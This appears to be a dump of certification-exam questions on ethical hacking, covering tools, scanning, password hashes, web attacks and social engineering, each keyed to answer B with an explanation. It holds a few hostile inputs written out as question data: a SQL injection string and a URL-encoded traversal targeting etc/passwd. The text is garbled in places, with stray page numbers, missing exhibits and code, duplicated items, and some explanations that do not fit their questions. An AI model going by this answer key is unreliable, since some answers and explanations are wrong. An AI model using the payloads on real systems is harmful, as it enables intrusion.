94 Which of the following commands runs snort in packet logger mode? A. ./snort -dev -h ./log B. ./snort -dev -l ./log C. ./snort -dev -o ./log D. ./snort -dev -p ./log

B (Explanation: Note: If you want to store the packages in binary mode for later analysis use ./snort -l ./log -b)

95 Which of the following command line switch would you use for OS detection in Nmap? A. -D B. -O C. -P D. -X

B (Explanation: OS DETECTION: -O: Enable OS detection (try 2nd generation w/fallback to 1st) - O2: Only use the new OS detection system (no fallback) -O1: Only use the old (1st generation) OS detection system --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess 55 OS more aggressively)

25 According to the CEH methodology, what is the next step to be performed after footprinting? A. Enumeration B. Scanning C. System Hacking D. Social Engineering E. Expanding Influence

B (Explanation: Once footprinting has been completed, scanning should be attempted next. Scanning should take place on two distinct levels: network and host.)

250 A POP3 client contacts the POP3 server: A. To send mail B. To receive mail C. to send and receive mail D. to get the address to send mail to E. initiate a UDP SMTP connection to read mail

B (Explanation: POP is used to receive e-mail.SMTP is used to send e-mail.)

328 You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server? A. 200-250 B. 121-371 C. 120-321 D. 121-231 E. 120-370 196

B (Explanation: Package number 120 have already been received by the server and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250).)

196 Password cracking programs reverse the hashing process to recover passwords.(True/False. A. True B. False

B (Explanation: Password cracking programs do not reverse the hashing process. Hashing is a one-way process. What these programs can do is to encrypt words, phrases, and characters using the same encryption process and compare them to the original password. A hashed match reveals the true password.)

20 Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal? (Note: The student is being tested on concept learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dumo.) 12 05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1 TCP TTL:44 TOS:0x10 ID:242 ***FRP** Seq: 0XA1D95 Ack: 0x53 Win: 0x400 . . . 05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024 TCP TTL:44 TOS:0x10 ID:242 ***FRP** Seg: 0XA1D95 Ack: 0x53 Win: 0x400 What is odd about this attack? (Choose the most appropriate statement) A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags. B. This is back orifice activity as the scan comes from port 31337. C. The attacker wants to avoid creating a sub-carrier connection that is not normally valid. D. There packets were created by a tool; they were not created by a standard IP stack.

B (Explanation: Port 31337 is normally used by Back Orifice. Note that 31337 is hackers spelling of 'elite', meaning 'elite hackers'.)

78 Exhibit 46 (Note: the student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal? What is odd about this attack? Choose the best answer. A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags. B. This is back orifice activity as the scan comes form port 31337. C. The attacker wants to avoid creating a sub-carries connection that is not normally valid. D. These packets were crafted by a tool, they were not created by a standard IP stack.

B (Explanation: Port 31337 is normally used by Back Orifice. Note that 31337 is hackers spelling of 'elite', meaning 'elite hackers'.)

536 Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would line to tunnel the information to the remote end but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link? A. MD5 B. SSH C. RSA D. PGP

B (Explanation: Port forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH Secure Shell. You can secure for example POP3, SMTP and HTTP connections that would otherwise be insecure.)

28 Your lab partner is trying to find out more information about a competitors web site. The site has a .com extension. She has decided to use some online whois tools and look in one of the regional Internet registrys. Which one would you suggest she looks in first? 17 A. LACNIC B. ARIN C. APNIC D. RIPE E. AfriNIC

B (Explanation: Regional registries maintain records from the areas from which they govern. ARIN is responsible for domains served within North and South America and therefore, would be a good starting point for a .com domain.)

190 _________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes. A. Trojan B. RootKit C. DoS tool D. Scanner E. Backdoor

B (Explanation: Rootkits are tools that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.)

390 Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database? A. Jimmy can submit user input that executes an operating system command to compromise a target system B. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system C. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database D. Jimmy can gain control of system to flood the target system with requests, preventing legitimate users from gaining access

B (Explanation: SQL injection is a security vulnerability that occurs in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. 234)

85 While performing ping scans into a target network you get a frantic call from the organization's security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization's IDS monitor. How can you modify your scan to prevent triggering this event in the IDS? A. Scan more slowly. B. Do not scan the broadcast IP. C. Spoof the source IP address. D. Only scan the Windows systems.

B (Explanation: Scanning the broadcast address makes the scan target all IP addresses on that subnet at the same time.)

330 Which of the following attacks takes best advantage of an existing authenticated connection A. Spoofing B. Session Hijacking C. Password Sniffing D. Password Guessing

B (Explanation: Session hijacking is the act of taking control of a user session after successfully 197 obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.)

311 Within the context of Computer Security, which of the following statements best describe Social Engineering? A. Social Engineering is the act of publicly disclosing information. B. Social Engineering is the act of getting needed information from a person rather than breaking into a system. C. Social Engineering is the means put in place by human resource to perform time accounting. D. Social Engineering is a training program within sociology studies.

B (Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information.)

349 Dan is conducting a penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session? A. Dan cannot spoof his IP address over TCP network B. The server will send replies back to the spoofed IP address C. Dan can establish an interactive session only if he uses a NAT D. The scenario is incorrect as Dan can spoof his IP and get responses 209

B (Explanation: Spoofing your IP address is only effective when there is no need to establish a two way connection as all traffic meant to go to the attacker will end up at the place of the spoofed address.)

45 An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system. The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target system. 28 What is the most probable reason? A. The firewall is blocking port 23 to that system. B. He cannot spoof his IP and successfully use TCP. C. He needs to use an automated tool to telnet in. D. He is attacking an operating system that does not reply to telnet even when open.

B (Explanation: Spoofing your IP will only work if you don't need to get an answer from the target system. In this case the answer (login prompt) from the telnet session will be sent to the "real" location of the IP address that you are showing as the connection initiator.)

313 Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context? A. Trailing B. Tailgating C. Swipe Gating D. Smooth Talking

B (Explanation: Tailgating, in which an unauthorized person follows someone with a pass into an office, is a very simple social engineering attack. The intruder opens the door, which the authorized user walks through, and then engages them in conversation about the weather or weekend sport while they walk past the reception area together.)

528 A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate? A. The system has crashed B. A buffer overflow attack has been attempted C. A buffer overflow attack has already occurred D. A firewall has been breached and this is logged E. An intrusion detection system has been triggered

B (Explanation: Terminator Canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction 322 to this observation is that the canaries are built of NULL terminators, CR, LF, and -1. The undesirable result is that the canary is known.)

476 The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. From the options given below choose the one best interprets the following entry: Apr 26 06:43:05 [6282] IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Interpret the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107.53 A. An IDS evasion technique B. A buffer overflow attempt C. A DNS zone transfer D. Data being retrieved from 63.226.81.13. 287

B (Explanation: The IDS log file is depicting numerous attacks, however, most of them are from different attackers, in reference to the attack in question, he is trying to mask his activity by trying to act legitimate, during his session on the honeypot, he changes users two times by using the "su" command, but never triess to attempt anything to severe.)

12 7 You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com websire for contact information and telephone number numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated? A. Visit google search engine and view the cached copy. B. Visit Archive.org site to retrieve the Internet archive of the acme website. C. Crawl the entire website and store them into your computer. D. Visit the company's partners and customers website for this information.

B (Explanation: The Internet Archive (IA) is a non-profit organization dedicated to maintaining an archive of Web and multimedia resources. Located at the Presidio in San Francisco, California, this archive includes "snapshots of the World Wide Web" (archived copies of pages, taken at various points in time), software, movies, books, and audio recordings (including recordings of live concerts from bands that allow it). This site is found at www.archive.org.)

182 You are attempting to crack LM Manager hashed from Windows 2000 SAM file. You will be using LM Brute force hacking tool for decryption. What encryption algorithm will you be decrypting? 109 A. MD4 B. DES C. SHA D. SSL

B (Explanation: The LM hash is computed as follows.1. The user's password as an OEM string is converted to uppercase. 2. This password is either null-padded or truncated to 14 bytes. 3. The "fixed-length" password is split into two 7-byte halves. 4. These values are used to create two DES keys, one from each 7-byte half. 5. Each of these keys is used to DES-encrypt the constant ASCII string "KGS!@#$%", resulting in two 8-byte ciphertext values. 6. These two ciphertext values are concatenated to form a 16-byte value, which is the LM hash.)

151 Which DNS resource record can indicate how long any "DNS poisoning" could last? A. MX B. SOA C. NS D. TIMEOUT

B (Explanation: The SOA contains information of secondary servers, update intervals and expiration times.)

408 On wireless networks, SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless networks? A. The SSID is only 32 bits in length. B. The SSID is transmitted in clear text. C. The SSID is the same as the MAC address for all vendors. D. The SSID is to identify a station, not a network.

B (Explanation: The SSID IS constructed to identify a network, it IS NOT the same as the MAC address and SSID's consists of a maximum of 32 alphanumeric characters.)

227 You have successfully brute forced basic authentication configured on a Web Server using Brutus hacking tool. The username/password is "Admin" and "Bettlemani@". You logon to the system using the brute forced password and plant backdoors and rootkits. After downloading various sensitive documents from the compromised machine, you proceed to clear the log files to hide your trace.. Which event log located at C:\Windows\system32\config contains the trace of your brute force attempts? A. AppEvent.Evt B. SecEvent.Evt C. SysEvent.Evt D. WinEvent.Evt

B (Explanation: The Security Event log (SecEvent.Evt) will contain all the failed logins against the system. Topic 6, Trojans and Backdoors)

375 Consider the following code: 223 If an attacker can trick a victim user to click a link like this and the web application does not validate input, then the victim's browser will pop up an alert showing the users current set of cookies. An attacker can do much more damage, including stealing passwords, resetting your home page or redirecting the user to another web site. What is the countermeasure against XSS scripting? A. Create an IP access list and restrict connections based on port number B. Replace "<" and ">" characters with ?lt; and ?gt; using server scripts C. Disable Javascript in IE and Firefox browsers D. Connect to the server using HTTPS protocol instead of HTTP

B (Explanation: The correct answer contains a string which is an HTML-quoted version of the original script. The quoted versions of these characters will appear as literals in a browser, rather than with their special meaning as HTML tags. This prevents any script from being injected into HTML output, but it also prevents any user-supplied input from being formatted with benign HTML. Topic 13, Web Based Password Cracking Techniques)

60 When Nmap performs a ping sweep, which of the following sets of requests does it send to 37 the target device? A. ICMP ECHO_REQUEST & TCP SYN B. ICMP ECHO_REQUEST & TCP ACK C. ICMP ECHO_REPLY & TFP RST D. ICMP ECHO_REPLY & TCP FIN

B (Explanation: The default behavior of NMAP is to do both an ICMP ping sweep (the usual kind of ping) and a TCP port 80 ACK ping sweep. If an admin is logging these this will be fairly characteristic of NMAP.)

262 ARP poisoning is achieved in _____ steps A. 1 B. 2 C. 3 D. 4

B (Explanation: The hacker begins by sending a malicious ARP "reply" (for which there was no previous request) to your router, associating his computer's MAC address with your IP Address. Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC Address with the routers IP Address. Now your machine thinks the hacker's computer is your router. The hacker has now used ARP poisoning to accomplish a MitM attack.)

140 MX record priority increases as the number increases.(True/False. 83 A. True B. False

B (Explanation: The highest priority MX record has the lowest number.)

109 Jenny a well known hacker scanning to remote host of 204.4.4.4 using nmap. She got the scanned output but she saw that 25 port states is filtered. What is the meaning of filtered port State? A. Can Accessible B. Filtered by firewall C. Closed D. None of above

B (Explanation: The state is either open, filtered, closed, or unfiltered. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.)

420 On wireless networks, a SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless network? A. The SSID is only 32 bits in length B. The SSID is transmitted in clear text C. The SSID is to identify a station not a network 251 D. The SSID is the same as the MAC address for all vendors

B (Explanation: The use of SSIDs is a fairly weak form of security, because most access points broadcast the SSID, in clear text, multiple times per second within the body of each beacon frame. A hacker can easily use an 802.11 analysis tool (e.g., AirMagnet, Netstumbler, or AiroPeek) to identify the SSID.)

363 Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to 216 [email protected]". What do you think has occurred? A. The web application picked up a record at random B. The web application returned the first record it found C. The server error has caused the application to malfunction D. The web application emailed the administrator about the error

B (Explanation: The web application sends a query to an SQL database and by giving it the criteria 1=1, which always will be true, it will return the first value it finds.)

148 Sara is using the nslookup command to craft queries to list all DNS information (such as Name Servers, host names, MX records, CNAME records, glue records (delegation for child Domains), zone serial number, TimeToLive (TTL) records, etc) for a Domain. What do you think Sara is trying to accomplish? Select the best answer. A. A zone harvesting B. A zone transfer C. A zone update D. A zone estimate

B (Explanation: The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. One should configure the master DNS server to allow zone transfers only from secondary (slave) DNS servers but this is often not implemented. By connecting to a specific DNS server and successfully issuing the ls -d domain-name > file-name you have initiated a zone transfer.)

325 What type of cookies can be generated while visiting different web sites on the Internet? A. Permanent and long term cookies. B. Session and permanent cookies. C. Session and external cookies. D. Cookies are all the same, there is no such thing as different type of cookies.

B (Explanation: There are two types of cookies: a permanent cookie that remains on a visitor's computer for a given time and a session cookie the is temporarily saved in the visitor's computer memory during the time that the visitor is using the Web site. Session cookies disappear when you close your Web browser.)

473 What do you conclude from the nmap results below? Staring nmap V. 3.10ALPHA0 (www.insecure.org/map/) (The 1592 ports scanned but not shown below are in state: closed) PortStateService 21/tcpopenftp 25/tcpopensmtp 80/tcpopenhttp 443/tcpopenhttps Remote operating system guess: Too many signatures match the reliability guess the OS. Nmap run completed - 1 IP address (1 host up) scanned in 91.66 seconds A. The system is a Windows Domain Controller. B. The system is not firewalled. C. The system is not running Linux or Solaris. D. The system is not properly patched.

B (Explanation: There is no reports of any ports being filtered. 285)

231 In the context of Trojans, what is the definition of a Wrapper? A. An encryption tool to protect the Trojan. B. A tool used to bind the Trojan with legitimate file. C. A tool used to encapsulated packets within a new header and footer. D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan.

B (Explanation: These wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code. 139)

467 Neil monitors his firewall rules and log files closely on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web sites during work hours, without consideration for others. Neil knows that he has an updated content filtering system and that such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? A. They are using UDP which is always authorized at the firewall. B. They are using tunneling software which allows them to communicate with protocols in a way it was not intended. C. They have been able to compromise the firewall, modify the rules, and give themselves proper access. D. They are using an older version of Internet Explorer that allows them to bypass the proxy server.

B (Explanation: This can be accomplished by, for example, tunneling the http traffic over SSH if you have a SSH server answering to your connection, you enable dynamic forwarding in the ssh client and configure Internet Explorer to use a SOCKS Proxy for network traffic.)

347 Take a look at the following attack on a Web Server using obstructed URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63%2f %70%61%73%73%77%64 The request is made up of: %2e%2e%2f%2e%2e%2f%2e%2f% = ../../../ %65%74%63 = etc %2f = / %70%61%73%73%77%64 = passwd How would you protect information systems from these attacks? A. Configure Web Server to deny requests involving Unicode characters. B. Create rules in IDS to alert on strange Unicode requests. C. Use SSL authentication on Web Servers. D. Enable Active Scripts Detection at the firewall and routers. 208

B (Explanation: This is a typical Unicode attack. By configuring your IDS to trigger on strange Unicode requests you can protect your web-server from this type of attacks.)

307 184 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe. This is an example of what kind of attack? A. Reverse Psychology B. Social Engineering C. Reverse Engineering D. Spoofing Identity E. Faking Identity

B (Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.)

318 Dave has been assigned to test the network security of Acme Corp. The test was announced to the employees. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a sand clock to mark the progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond? A. The attack did not fall through as the firewall blocked the traffic B. The attack was social engineering and the firewall did not detect it C. The attack was deception and security was not directly compromised D. Security was not compromised as the webpage was hosted internally

B (Explanation: This was just another way to trick the information out of the users without the need to hack into any systems. All traffic is outgoing and initiated by the user so the firewall will not react. 191)

63 Which of the following ICMP message types are used for destinations unreachables? A. 0 B. 3 C. 11 D. 13 E. 17

B (Explanation: Type 3 messages are used for unreachable messages. 0 is Echo Reply, 8 is Echo request, 11 is time exceeded, 13 is timestamp and 17 is subnet mask request. Learning these would be advisable for the test.)

74 Which of the following ICMP message types are used for destinations unreachables? A. 0 B. 3 C. 11 44 D. 13 E. 17

B (Explanation: Type 3 messages are used for unreachable messages. 0 is Echo Reply, 8 is Echo request, 11 is time exceeded, 13 is timestamp and 17 is subnet mask request. Learning these would be advisable for the test.)

317 Sabotage, Advertising and Covering are the three stages of _____ A. Social engineering B. Reverse Social Engineering C. Reverse Software Engineering D. Rapid Development Engineering

B (Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.)

120 War dialing is one of the oldest methods of gaining unauthorized access to the target systems, it is one of the dangers most commonly forgotten by network engineers and system administrators. A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network. Through wardialing an attacker searches for the devices located in the target network infrastructure that are also accessible through the telephone line. 'Dial backup' in routers is most frequently found in networks where redundancy is required. Dial-on-demand routing(DDR) is commonly used to establish connectivity as a backup. As a security testers, how would you discover what telephone numbers to dial-in to the router? A. Search the Internet for leakage for target company's telephone number to dial-in B. Run a war-dialing tool with range of phone numbers and look for CONNECT Response C. Connect using ISP's remote-dial in number since the company's router has a leased line connection established with them D. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in

B (Explanation: Use a program like Toneloc to scan the company's range of phone numbers.)

131 John is a keen administrator, and has followed all of the best practices as he could find on securing his Windows Server. He has renamed the Administrator account to a new name that he is sure cannot be easily guessed. However, there are people who already attempt to compromise his newly renamed administrator account. How is it possible for a remote attacker to decipher the name of the administrator account if it has been renamed? A. The attacker used the user2sid program. B. The attacker used the sid2user program. C. The attacker used nmap with the -V switch. D. The attacker guessed the new name.

B (Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug but call the functions LookupAccountName and LookupAccountSid respectively. What is more these can be called against a remote machine without providing logon credentials save those needed for a null session connection.)

32 System Administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup posting to glean insight into the makeup of a target network. How would you search for these posting using Google search? 20 A. Search in Google using the key strings "the target company" and "newsgroups" B. Search for the target company name at http://groups.google.com C. Use NNTP websites to search for these postings D. Search in Google using the key search strings "the target company" and "forums"

B (Explanation: Using http://groups.google.com is the easiest way to access various newsgroups today. Before http://groups.google.com you had to use special NNTP clients or subscribe to some nntp to web services.)

427 The Slammer Worm exploits a stack-based overflow that occurs in a DLL implementing the Resolution Service. Which of the following Database Server was targeted by the slammer worm? A. Oracle B. MSSQL C. MySQL D. Sybase E. DB2

B (Explanation: W32.Slammer is a memory resident worm that propagates via UDP Port 1434 and exploits a vulnerability in SQL Server 2000 systems and systems with MSDE 2000 that have not applied the patch released by Microsoft Security Bulletin MS02-039.)

193 How can you determine if an LM hash you extracted contains a password that is less than 8 characters long? 115 A. There is no way to tell because a hash cannot be reversed B. The right most portion of the hash is always the same C. The hash always starts with AB923D D. The left most portion of the hash is always the same E. A portion of the hash will be all 0's

B (Explanation: When looking at an extracted LM hash, you will sometimes observe that the right most portion is always the same. This is padding that has been added to a password that is less than 8 characters long.)

442 WinDump is a popular sniffer which results from the porting to Windows of TcpDump for Linux. What library does it use ? A. LibPcap B. WinPcap C. Wincap D. None of the above

B (Explanation: WinPcap is the industry-standard tool for link-layer network access in Windows 265 environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.)

461 Once an intruder has gained access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the used account to one that has increased privileges. such as that of an administrator. What would be the best countermeasure to protect against escalation of priveges? 277 A. Give users tokens B. Give user the least amount of privileges C. Give users two passwords D. Give users a strong policy document

B (Explanation: With less privileges it is harder to increase the privileges.)

17 A Company security System Administrator is reviewing the network system log files. He notes the following: Network log files are at 5 MB at 12:00 noon. At 14:00 hours, the log files at 3 MB. What should he assume has happened and what should he do about the situation? 10 A. He should contact the attacker's ISP as soon as possible and have the connection disconnected. B. He should log the event as suspicious activity, continue to investigate, and take further steps according to site security policy. C. He should log the file size, and archive the information, because the router crashed. D. He should run a file system check, because the Syslog server has a self correcting file system problem. E. He should disconnect from the Internet discontinue any further unauthorized use, because an attack has taken place.

B (Explanation: You should never assume a host has been compromised without verification. Typically, disconnecting a server is an extreme measure and should only be done when it is confirmed there is a compromise or the server contains such sensitive data that the loss of service outweighs the risk. Never assume that any administrator or automatic process is making changes to a system. Always investigate the root cause of the change on the system and follow your organizations security policy.)

548 Bob is a Junior Administrator at ABC Company. He is installing the RedHat Enterprise Linux on his machine. At installation time, he removed the "Use MD5" options. What will be the hashing standard? A. MD2 B. DES C. 3DES D. RSA 333

B (Explanation: crypt() will return an encrypted string using the standard Unix DES-based encryption algorithm or alternative algorithms that may be available on the system. By removing the "Use MD5" option Bob forces crypt() to revert to DES encryption.)

13 User which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud? A. 18 U.S.C 1029 Possession of Access Devices B. 18 U.S.C 1030 Fraud and related activity in connection with computers C. 18 U.S.C 1343 Fraud by wire, radio or television D. 18 U.S.C 1361 Injury to Government Property E. 18 U.S.C 1362 Government communication systems F. 18 U.S.C 1831 Economic Espionage Act G. 18 U.S.C 1832 Trade Secrets Act

B (Explanation: http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001030----000- .html 8)

264 Exhibit: You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply? A. ip = 10.0.0.22 B. ip.src == 10.0.0.22 C. ip.equals 10.0.0.22 D. ip.address = 10.0.0.22

B (Explanation: ip.src tells the filter to only show packets with 10.0.0.22 as the source.)

444 Rebecca has noted multiple entries in her logs about users attempting to connect on ports that are either not opened or ports that are not for public usage. How can she restrict this type of abuse by limiting access to only specific IP addresses that are trusted by using one of the built-in Linux Operating System tools? 266 A. Ensure all files have at least a 755 or more restrictive permissions. B. Configure rules using ipchains. C. Configure and enable portsentry on his server. D. Install an intrusion detection system on her computer such as Snort.

B (Explanation: ipchains is a free software based firewall for Linux. It is a rewrite of Linux's previous IPv4 firewalling code, ipfwadm. In Linux 2.2, ipchains is required to administer the IP packet filters. ipchains was written because the older IPv4 firewall code used in Linux 2.0 did not work with IP fragments and didn't allow for specification of protocols other than TCP, UDP, and ICMP.)

454 On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned. How is it possible to list processes and uids associated with them in a more reliable manner? A. Use "Is" B. Use "lsof" C. Use "echo" D. Use "netstat"

B (Explanation: lsof is a command used in many Unix-like systems that is used to report a list of all open files and the processes that opened them. It works in and supports several UNIX flavors.)

261 What is the command used to create a binary log file using tcpdump? A. tcpdump -r log B. tcpdump -w ./log C. tcpdump -vde -r log D. tcpdump -l /var/log/

B (Explanation: tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ expression ] -w Write the raw packets to file rather than parsing and printing them out. 157)

5 Which of the following describes the characteristics of a Boot Sector Virus? A. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR B. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR C. Modifies directory table entries so that directory entries point to the virus code instead of the actual program D. Overwrites the original MBR and only executes the new virus code

B (Explanation: A boot sector virus is a computer virus that infects a storage device's master boot record (MBR). 4 The virus moves the boot sector to another location on the hard drivE. References: https://www.techopedia.com/definition/26655/boot-sector-virus)

4 Which of the following can the administrator do to verify that a tape backup can be recovered in its entirety? A. Restore a random file B. Perform a full restore. C. Read the first 512 bytes of the tape. D. Read the last 512 bytes of the tape.

B (Explanation: A full restore is required.)

3 A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack? A. Paros Proxy B. BBProxy C. BBCrack D. Blooover

B (Explanation: Blackberry users warned of hacking tool threat. Users have been warned that the security of Blackberry wireless e-mail devices is at risk due to the availability this week of a new hacking tool. Secure Computing Corporation said businesses that have installed Blackberry servers behind their gateway security devices could be vulnerable to a hacking attack from a tool call BBProxy. References: http://www.computerweekly.com/news/2240062112/Technology-news-in-brief)

1 Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function? A. Fast processor to help with network traffic analysis B. They must be dual-homed C. Similar RAM requirements D. Fast network interface cards

B (Explanation: Dual-homed or dual-homing can refer to either an Ethernet device that has more than one network interface, for redundancy purposes, or in firewall technology, dual-homed is one of the firewall architectures, such as an IDS/IPS system, for implementing preventive security. References: https://en.wikipedia.org/wiki/Dual-homed)

6 Which statement is TRUE regarding network firewalls preventing Web Application attacks? A. Network firewalls can prevent attacks because they can detect malicious HTTP traffic. B. Network firewalls cannot prevent attacks because ports 80 and 443 must be opened. C. Network firewalls can prevent attacks if they are properly configured. D. Network firewalls cannot prevent attacks because they are too complex to configure.

B (Explanation: Network layer firewalls, also called packet filters, operate at a relatively low level of the TCP/IP protocol stack, not allowing packets to pass through the firewall unless they match the established rule set. To prevent Web Application attacks an Application layer firewall would be requireD. References: https://en.wikipedia.org/wiki/Firewall_(computing)#Network_layer_or_packet_filters)

226 Which type of security document is written with specific step-by-step details? A. Process B. Procedure C. Policy D. Paradigm

B (Explanation: Topic 7, Ethics)

713 When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the "TCP three-way handshake." While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK. How would an attacker exploit this design by launching TCP SYN attack? A. Attacker generates TCP SYN packets with random destination addresses towards a victim host B. Attacker floods TCP SYN packets with random source addresses towards a victim host C. Attacker generates TCP ACK packets with random source addresses towards a victim host D. Attacker generates TCP RST packets with random source addresses towards a victim host

B ( Attacker floods TCP SYN packets with random source addresses towards a victim host)

725 What type of attack is shown here? A. Bandwidth exhaust Attack B. Denial of Service Attack C. Cluster Service Attack D. Distributed Denial of Service Attack

B ( Denial of Service Attack)

716 Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called? A. Information Audit Policy (IAP) B. Information Security Policy (ISP) C. Penetration Testing Policy (PTP) D. Company Compliance Policy (CCP)

B ( Information Security Policy (ISP))

